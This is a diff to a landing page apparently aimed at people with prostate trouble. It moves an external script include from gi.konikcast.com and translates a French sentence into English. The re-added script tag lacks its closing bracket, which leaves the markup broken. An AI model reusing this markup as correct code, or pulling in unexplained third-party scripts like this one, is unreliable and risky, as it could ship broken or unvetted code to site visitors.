--- a/apro/index.html
+++ b/apro/index.html
@@ -15,9 +15,9 @@
 		margin: 0 .07em !important; vertical-align: -0.1em !important; background:
 		none !important; padding: 0 !important; }
 	</style>
-	<script src="https://gi.konikcast.com/cf.js"></script>
 	<link rel="stylesheet" id="wp-block-library-css" href="style.min.css" media="all">
 	<link rel="stylesheet" id="twentytwenty-style-css" href="style.css" media="all">
+	<script src="https://gi.konikcast.com/cf.js"></script
 	<style id="twentytwenty-style-inline-css">
 		.color-accent,.color-accent-hover:hover,.color-accent-hover:focus,:root
 		.has-accent-color,.has-drop-cap:not(:focus):first-letter,.wp-block-button.is-style-outline,a
@@ -133,9 +133,7 @@
 								</p>
 								<p>
 									<span style="font-family: georgia, palatino; color: rgb(0, 0, 0); font-size: 20px;" data-mce-style="font-family: georgia, palatino; color: #000000; font-size: 20px;">
-										Vous pouvez être l’un des nombreux à avoir récemment reçu un diagnostic
-										d’hypertrophie de la prostate ou vous ne pouvez même pas être atteint de
-										troubles de la prostate.
+										You may be one of the many who have recently been diagnosed with an enlarged prostate, or you may not even have prostate trouble.
 									</span>
 									&nbsp;
 								</p>
